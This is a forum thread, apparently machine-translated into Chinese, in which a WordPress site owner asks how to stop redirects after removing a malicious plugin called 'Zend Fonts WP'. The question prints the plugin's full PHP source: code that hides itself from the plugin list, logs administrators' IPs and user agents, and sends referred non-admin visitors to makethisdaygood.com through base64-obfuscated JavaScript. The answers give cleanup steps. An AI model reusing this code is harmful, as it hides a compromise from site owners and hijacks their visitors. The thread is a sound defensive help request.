我取消激活,然后删除了一个恶意的“插件”WordPress上,我从来没有安装在首位。它的名称是Zend字体WP。虽然,我的网站仍然被重定向到“https://makethisdaygood.com/main“这是一个网站,我不知道,这不工作反正。下一步我该怎么办?
下面是我删除的插件的文件中的代码:
if ( ! defined( 'ABSPATH' ) ) {
exit();
}
function get_the_user_ip() {
if ( isset( $_SERVER['HTTP_CF_CONNECTION_IP'] ) ) {
$ip = $_SERVER['HTTP_CF_CONNECTION_IP'];
}
elseif ( isset( $_SERVER['HTTP_CLIENT_IP'] ) ) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
}
elseif ( isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
function isAdminUser(){
if (current_user_can('administrator') || current_user_can('editor'))
return true;
else
return false;
}
function console_log( $data ){
echo '<script>';
echo 'console.log('. json_encode( $data ) .')';
echo '</script>';
}
//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
return $plugins;
}
add_action("init", "sayecho");
function sayecho(){
global $wpdb;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_ip = get_the_user_ip();
$isAdmin = isAdminUser();
$table_name = $wpdb->prefix."wusers_inputs";
$isBot = strpos(strtolower($user_agent), 'bot');
$timeNow = time();
$pluginTimeTableName = $wpdb->prefix.'wzen_time_table';
// $wpdb->query("DROP TABLE IF EXISTS $pluginTimeTableName");
// $wpdb->query("DROP TABLE IF EXISTS $table_name");
if ($wpdb->get_var('SHOW TABLES LIKE "'.$pluginTimeTableName.'"') != $pluginTimeTableName) {
$sql = 'CREATE TABLE '.$pluginTimeTableName.' (`time` int(11) UNSIGNED NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
require_once(ABSPATH.'wp-admin/includes/upgrade.php');
dbDelta($sql);
$wpdb->insert($pluginTimeTableName, array('time'=>$timeNow));
}
$pluginStartTime = null;
foreach($wpdb->get_results("SELECT * FROM {$pluginTimeTableName}") as $data){
$pluginStartTime = $data->time;
break;
}
//check user is not from REF, not BOT and plugin install time to skip recording your data
if(!isset($_SERVER['HTTP_REFERER']) && !$isBot && $pluginStartTime + 60 < time()) {
//if table is not exists - create table
if ( $wpdb->get_var( 'SHOW TABLES LIKE "' . $table_name . '"' ) != $table_name ) {
$sql = 'CREATE TABLE ' . $table_name . ' (`ip` varchar(535) NOT NULL,`useragent` varchar(535) NOT NULL,`adminID` int NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
dbDelta( $sql );
}
//if admin - add IP and UA to DB
if ( $isAdmin ) {
$isIpAndUaInDB = $wpdb->get_var(
$wpdb->prepare(
"SELECT * FROM {$table_name} WHERE ip like %s AND useragent like %s LIMIT 1",
$user_ip, $user_agent ) );
if ( ! $isIpAndUaInDB ) {
$wpdb->insert( $table_name, [
'ip' => $user_ip,
'useragent' => $user_agent,
'adminID' => $isAdmin ? get_current_user_id() : - 1,
] );
}
}
}
//do redirect if user from REF and NOT Admin
if(isset( $_SERVER['HTTP_REFERER']) && !$isAdmin){
redirect();
}
}
function redirect()
{
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
if (!isset($_COOKIE[base64_decode('aHRfcnI=')])) {
setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url . base64_decode( 'Ijs8L3NjcmlwdD4=' );
}
}
编辑:我所做的修改似乎在几个小时后就生效了。我希望它不会再出现了!谢谢你的帮助!
2条答案
按热度按时间vdgimpew1#
您可以执行以下步骤作为调试。
1.请在WP Jmeter 板中检查您的网站URL和主页URL。
1.请删除.htaccess文件。(它将再次生成)
1.检查wp-config.php文件,并检查是否有任何网站的网址设置在该.
1.检查数据库wp_options表并正确设置您的url。
1.或者使用任何外部安全插件,如“Wordfence”。扫描您的网站并清理被黑客攻击的网站。
chhkpiq42#
可以将实际URL替换为现有URL即,
函数重定向块中的
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
你可以在这个网址“www.example.com“中解码url名称https://www.base64encode.org/
例如现在这个URL
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
指的是makethisdaygood.com/main,您需要更改您的实际URL。希望能有所帮助。